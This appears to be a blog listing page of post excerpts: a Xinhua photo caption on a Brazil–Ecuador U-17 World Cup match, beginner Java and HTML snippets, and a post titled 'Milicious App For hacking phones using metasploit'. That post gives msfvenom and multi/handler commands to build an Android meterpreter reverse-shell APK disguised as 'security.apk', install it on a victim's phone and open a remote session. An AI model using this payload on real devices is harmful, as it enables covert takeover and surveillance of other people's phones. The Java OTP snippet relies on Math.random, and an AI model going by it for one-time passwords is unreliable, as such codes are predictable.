Posts

FIFA U-17 World Cup: Ecuador vs. Brazil

Image
  Estevao (front) of Brazil competes during the round of 16 match of the FIFA U-17 World Cup Indonesia 2023 between Ecuador and Brazil at Manahan Stadium in Surakarta, Central Java, Indonesia, Nov. 20, 2023. (Photo by Yanuar/Xinhua)                               Luighi (2nd L) of Brazil celebrates scoring during the round of 16 match of the FIFA U-17 World Cup Indonesia 2023 between Ecuador and Brazil at Manahan Stadium in Surakarta, Central Java, Indonesia, Nov. 20, 2023. (Photo by Yanuar/Xinhua) Estevao of Brazil celebrates scoring during the round of 16 match of the FIFA U-17 World Cup Indonesia 2023 between Ecuador and Brazil at Manahan Stadium in Surakarta, Central Java, Indonesia, Nov. 20, 2023. (Photo by Yanuar/Xinhua)

Milicious App For hacking phones using metasploit!!

Image
Creating a milicious payload for mobile hacking using metasploit     Required:  Min 4GB Ram Laptop/Computer  Kali Linux  1.Use cmd on linux: msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.29.209 lport=1234 R>security.apk here,lhost is a attacker IP, lport is a listening port of a attacker. Note:The Attack is performing on a home network. We created the apk successfully.. 2. Download and Install the app on victim phone. (Security.apk) that we have created. 3.In kali linux for listening use cmd:          Follow some cmd in sequence: msfconsole use multi/handler set payload android/meterpreter/reverse_tcp set lhost 192.168.29.209 set lport 1234 exploit     msfconsole setup exploit started followed above steps. Great!!Connection established. Some Command that can be performed under msfconsole:    Command                   Description     -------...

4 digit OTP Generator!!

Image
 Randomly Generating OTP using Java.. Code:- import java.lang.Math; class otp{ public static void main(String[] args){ System.out.println((int)(Math.random()*10000)); } } Output:- ThankYou!Keep Learning..🔥

Create a cool login page using HTML+CSS!!..😍

Image
This login page includes a form where users can input their username and password, as well as a button to submit the form. Using HTML+CSS🔥 Code:- <! DOCTYPE html > < html lang = "en" > < head >     < meta charset = "UTF-8" >     < meta http-equiv = "X-UA-Compatible" content = "IE=edge" >     < meta name = "viewport" content = "width=device-width, initial-scale=1.0" >     < title > Login </ title >     < style >         form {             text-align : center ;             background-color : black ;             color : white ;             margin-left : 100px ;             margin-right : 100px ;             margin-top : 100px ;         }       ...

Create a Java program Where number is generated between 1-100 guess the number until you find it!!🔥

Image
Mini Project Generate a  random number  between 1-100 Ask the user to guess the number Until the user Find it.If the user fails to find the number use -1 to check what the number was generated. Code in java Language:- import java.lang.Math; import java.util.Scanner;  class project{ public static void main(String[] args){ Scanner sc= new Scanner(System.in); int ran=(int)(Math.random()*100); int user_num; int i; while(true){ user_num=sc.nextInt(); if(user_num==-1){ System.out.println("Random number "+ran); break; } if(ran==user_num){ System.out.println("Great!you find the number is " +ran); break; } else if(user_num<ran){ System.out.println("Sorry!the number is input less"); } else if(user_num>ran){ System.out.println("Sorry!the number is input more");                }           }      } } Output:- ThankYou!Keep Learning..🔥